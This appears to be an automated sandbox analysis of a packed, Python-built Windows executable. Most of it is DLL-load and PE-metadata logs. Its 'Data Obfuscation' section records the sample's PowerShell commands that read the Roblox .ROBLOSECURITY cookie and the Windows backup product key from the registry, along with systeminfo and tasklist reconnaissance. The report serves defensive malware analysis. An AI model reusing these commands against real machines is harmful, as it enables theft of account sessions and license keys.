              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: mpclient.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: secur32.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sspicli.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: version.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: msasn1.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: kernel.appcore.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: userenv.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: ahost.exeStatic PE information: Image base 0x140000000 > 0x60000000
              Source: ahost.exeStatic file information: File size 7967812 > 1048576
              Source: ahost.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: ahost.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: ahost.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: ahost.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: ahost.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: ahost.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: ahost.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: ahost.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: ahost.exe, 00000002.00000002.1877240019.00007FF8E7207000.00000040.00000001.01000000.00000013.sdmp
              Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: ahost.exe, 00000002.00000002.1875848363.00007FF8E6B6A000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: ahost.exe, 00000002.00000002.1877729374.00007FF8E72A5000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.15 3 Sep 20243.0.15built on: Wed Sep 4 15:52:04 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_p
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: ahost.exe, 00000000.00000003.1389281652.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1882674350.00007FF8F8324000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: ahost.exe, 00000002.00000002.1875848363.00007FF8E6AD2000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: ahost.exe, 00000000.00000003.1389281652.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1882674350.00007FF8F8324000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
              Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: ahost.exe, ahost.exe, 00000002.00000002.1878537582.00007FF8E7331000.00000040.00000001.01000000.0000000B.sdmp
              Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: ahost.exe, ahost.exe, 00000002.00000002.1875848363.00007FF8E6B6A000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000068.00000000.1738525769.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmp, rar.exe, 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmp
              Source: Binary string: 6C:\Users\user\AppData\Local\Temp\ohbt5slp\ohbt5slp.pdb source: powershell.exe, 00000046.00000002.1646857023.0000017B02BE1000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: ahost.exe, 00000002.00000002.1883107537.00007FF8F9181000.00000040.00000001.01000000.0000000D.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: ahost.exe, 00000002.00000002.1881541299.00007FF8E83E1000.00000040.00000001.01000000.00000006.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: ahost.exe, 00000002.00000002.1881203499.00007FF8E8381000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WA source: ahost.exe
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: ahost.exe, 00000002.00000002.1880925257.00007FF8E824B000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: ahost.exe, 00000002.00000002.1882883847.00007FF8F8CA1000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: 6C:\Users\user\AppData\Local\Temp\ohbt5slp\ohbt5slp.pdbhPh source: powershell.exe, 00000046.00000002.1646857023.0000017B02BE1000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: ahost.exe, 00000002.00000002.1880925257.00007FF8E824B000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: ahost.exe, 00000002.00000002.1882291196.00007FF8F7A91000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: ahost.exe, 00000002.00000002.1881902584.00007FF8F0D01000.00000040.00000001.01000000.0000000C.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: ahost.exe, 00000002.00000002.1880634708.00007FF8E8201000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\python313.pdb source: ahost.exe, 00000002.00000002.1878937308.00007FF8E78B8000.00000040.00000001.01000000.00000004.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdb source: ahost.exe, ahost.exe, 00000002.00000002.1877729374.00007FF8E72A5000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: oh.pdb. source: powershell.exe, 00000046.00000002.1723901604.0000017B19878000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: ahost.exe, ahost.exe, 00000002.00000002.1878181431.00007FF8E72FE000.00000040.00000001.01000000.0000000E.sdmp
              Source: ahost.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: ahost.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: ahost.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: ahost.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: ahost.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

              Data Obfuscation

              barindex
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: VCRUNTIME140.dll.0.drStatic PE information: 0x78BDDED1 [Sat Mar 11 17:01:05 2034 UTC]
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ohbt5slp\ohbt5slp.cmdline"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ohbt5slp\ohbt5slp.cmdline"
              Source: python313.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x1cb64b
              Source: _ctypes.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x1f35a
              Source: unicodedata.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x46d69
              Source: _bz2.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0xdba7
              Source: libffi-8.dll.0.drStatic PE information: real checksum: 0x0 should be: 0xa1d1
              Source: _ssl.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x17cae
              Source: sqlite3.dll.0.drStatic PE information: real checksum: 0x0 should be: 0xa8f8a
              Source: ohbt5slp.dll.82.drStatic PE information: real checksum: 0x0 should be: 0xd287
              Source: libcrypto-3.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x197f77
              Source: _queue.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x11959
              Source: _socket.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x1a226
              Source: _decimal.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x1fcc8
              Source: _hashlib.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0xdd74
              Source: libssl-3.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x4330c
              Source: select.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x7797
              Source: _lzma.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x21293
              Source: _sqlite3.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x15eca
              Source: ahost.exeStatic PE information: real checksum: 0x799bab should be: 0x79f425
              Source: libffi-8.dll.0.drStatic PE information: section name: UPX2
              Source: VCRUNTIME140.dll.0.drStatic PE information: section name: fothk
              Source: VCRUNTIME140.dll.0.drStatic PE information: section name: _RDATA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FF884F7D2A5 pushad ; iretd 12_2_00007FF884F7D2A6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FF88509860D push ebx; ret 12_2_00007FF88509860A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FF8850985FD push ebx; ret 12_2_00007FF88509860A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FF885098448 push ebx; ret 12_2_00007FF88509847A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FF8850900BD pushad ; iretd 12_2_00007FF8850900C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 70_2_00007FF8867000BD pushad ; iretd 70_2_00007FF8867000C1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
